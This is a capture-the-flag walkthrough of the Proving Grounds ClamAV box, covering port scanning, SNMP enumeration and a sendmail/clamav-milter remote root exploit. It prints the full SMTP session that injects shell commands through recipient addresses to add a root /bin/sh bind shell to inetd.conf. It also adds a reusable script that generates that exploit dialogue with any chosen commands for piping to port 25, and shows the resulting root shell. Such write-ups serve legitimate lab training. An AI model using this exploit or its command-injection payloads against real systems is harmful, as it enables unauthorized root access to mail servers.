
PG - ClamAV Walkthrough


TL;DR

  • Enumerate SNMP (UDP 161, which a TCP-only scan does not cover) and find traces of clamav-milter
  • Exploit the clamav-milter < 0.91.2 remote command execution through sendmail's recipient handling to get a root bind shell

Enumeration

Port Scan

Start with a full TCP port scan of the target using Nmap (-p- covers all TCP ports; UDP services such as SNMP are not included).

$ nmap -sVC -T4 -v -p- -oN nmapFull.txt $ip
...
PORT    STATE SERVICE     VERSION                                                        
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.49.180], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open  smux        Linux SNMP multiplexer
445/tcp open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)

Searching for publicly disclosed exploits

We now know the target is running Sendmail 8.13.4. A quick searchsploit query for sendmail turns up a remote command execution entry, but note the title: it is for Sendmail running with clamav-milter older than 0.91.2, not for sendmail itself.

$ searchsploit sendmail 
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                        |  Path                           
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...                                                                                                                              | unix/local/21884.txt
Sendmail 8.13.5 - Remote Signal Handling (PoC)                                                                                        | linux/dos/2051.py
Sendmail 8.6.9 IDENT - Remote Command Execution                                                                                       | unix/remote/20599.sh
Sendmail 8.9.2 - Headers Prescan Denial of Service                                                                                    | irix/dos/23167.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)                                                              | linux/dos/21476.c
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)                                                              | linux/dos/21477.c
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                       | multiple/remote/4761.pl
...
The RCE entry only applies if sendmail on the target is actually running with a vulnerable clamav-milter, and the port scan alone does not tell us whether it is.

I actually wasn't able to find any trace of clamav-milter before using the exploit. I tried the exploit and it worked, so I never gave it a thought. I happened to look at the official walkthrough later on, only to find out that we were supposed to do enumeration on SNMP to get more information regarding clamav-milter. While I skipped the crucial part for this box, I now have an updated checklist for my enumeration methodology. Learn from your mistakes and never be afraid to check out walkthroughs and guides if you are stuck.
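The SNMP check the walkthrough says it skipped, as an added example that is not part of the original post: the TCP scan shows smux on 199 (the SNMP multiplexer), which hints at an SNMP agent on UDP 161. Walking the HOST-RESOURCES-MIB running-process table (hrSWRunName, hrSWRunPath, hrSWRunParameters) lists every process the agent can see, so a clamav-milter process confirms the exploit's precondition before anything is sent to port 25. The SNMP version (v2c), the community string ("public") and the sample walk output are assumptions; the sample is constructed, not captured from this box.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): confirm clamav-milter
# over SNMP before firing the exploit. Assumes SNMPv2c and the community
# string "public"; adjust both if the target differs.

# hrSWRunName, hrSWRunPath and hrSWRunParameters from HOST-RESOURCES-MIB:
# the running-process table, which exposes every process name, binary path
# and command line the agent can see.
HR_SWRUN_NAME=1.3.6.1.2.1.25.4.2.1.2
HR_SWRUN_PATH=1.3.6.1.2.1.25.4.2.1.4
HR_SWRUN_PARAMS=1.3.6.1.2.1.25.4.2.1.5

# Keep only process-table rows that mention clamav-milter. The exit status is
# grep's (0 if the milter shows up, 1 if not), so it can gate the next step.
filter_milter() {
    grep -i 'clamav-milter'
}

# Walk the three columns on a live target and pass them through the filter.
# Usage: snmp_find_milter 192.168.154.42 public
snmp_find_milter() {
    target=$1
    community=${2:-public}
    for oid in "$HR_SWRUN_NAME" "$HR_SWRUN_PATH" "$HR_SWRUN_PARAMS"; do
        snmpwalk -v2c -c "$community" "$target" "$oid"
    done | filter_milter
}

# Constructed sample of what such a walk returns (not captured from the box),
# so the filter can be exercised offline.
SAMPLE_WALK='HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "init"
HOST-RESOURCES-MIB::hrSWRunName.1234 = STRING: "sendmail-mta"
HOST-RESOURCES-MIB::hrSWRunName.1301 = STRING: "clamav-milter"
HOST-RESOURCES-MIB::hrSWRunPath.1301 = STRING: "/usr/sbin/clamav-milter"
HOST-RESOURCES-MIB::hrSWRunParameters.1234 = STRING: "-bd -q10m"
HOST-RESOURCES-MIB::hrSWRunParameters.1301 = STRING: "-ol local:/var/run/clamav/clamav-milter.ctl"'

# Offline demonstration against the sample: prints the three rows naming
# the milter and exits 0.
printf '%s\n' "$SAMPLE_WALK" | filter_milter
```

Against a real target, replace the demonstration line with snmp_find_milter and the box's address; if it prints nothing, the milter is not visible over SNMP and the searchsploit entry should not be assumed to apply.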

Exploitation

Copy the exploit to your desired working directory.

$ searchsploit -m multiple/remote/4761.pl                         
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761                  
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl       
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/clamav/exploit/4761.pl 

It is a Perl script that takes the target IP as its only argument. It talks to sendmail on port 25 and, through the recipient handling shown in the session below, appends a root /bin/sh -i service on port 31337 to /etc/inetd.conf and restarts inetd. On success we are left with a root bind shell on port 31337.

$ sudo perl 4761.pl 192.168.154.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.154.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 24 Aug 2021 13:37:10 -0400; (No UCE/UBE) logging access from: [192.168.49.154](FAIL)-[192.168.49.154]
250-localhost.localdomain Hello [192.168.49.154], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 17OHbALb003999 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
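To make clear what 4761.pl actually sends, here is the client side of that exchange reconstructed from the server replies above, as an added example rather than the exploit's own code: an EHLO, a null sender, one RCPT TO per command in the user+"|command" form the transcript shows sendmail accepting, a throwaway message body, and QUIT. The two default commands are exactly the ones in the transcript; the HELO name, the message body and the option of substituting other commands are assumptions. The output can be piped to the target's port 25 (for instance with nc) to replay the exploit, or inspected first with count_payloads.

```shell
#!/bin/sh
# Added example: the SMTP conversation behind 4761.pl, reconstructed from the
# server replies in the walkthrough. Not the original exploit script.

# Emit the client side of the exchange. $1 is the name announced in EHLO
# (arbitrary); any further arguments are the commands to run, one per
# RCPT TO. With no commands given, the two defaults reproduce the inetd
# bind shell on 31337 from the walkthrough.
milter_smtp_dialogue() {
    helo_name=${1:-attacker}
    if [ $# -gt 0 ]; then shift; fi
    if [ $# -eq 0 ]; then
        set -- \
            "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf" \
            "/etc/init.d/inetd restart"
    fi
    printf 'EHLO %s\r\n' "$helo_name"
    printf 'MAIL FROM:<>\r\n'
    for cmd in "$@"; do
        # user+"|command": the form the transcript shows being accepted
        printf 'RCPT TO:<nobody+"|%s">\r\n' "$cmd"
    done
    printf 'DATA\r\n'
    printf 'Subject: x\r\n\r\nx\r\n.\r\n'   # body content is irrelevant (assumption)
    printf 'QUIT\r\n'
}

# Sanity check before sending: how many commands would this dialogue run?
# Reads a dialogue on stdin and prints the number of piped recipients.
count_payloads() {
    grep -c '^RCPT TO:<nobody+"|'
}

# Usage (replay against a target):  milter_smtp_dialogue kali | nc 192.168.154.42 25
# Offline: print the default dialogue so it can be reviewed.
milter_smtp_dialogue
```

Substituting your own command (for example a reverse shell instead of the persistent inetd entry) avoids leaving a root service listening on the box after the engagement.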

Now connect to the bind shell on port 31337 using nc.

$ nc 192.168.154.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
cat proof.txt
<Redacted>
Since the bind shell already runs as root, there is no need for privilege escalation. Note that the exploit leaves a persistent root service in /etc/inetd.conf; remove that line and restart inetd when you are done with the box.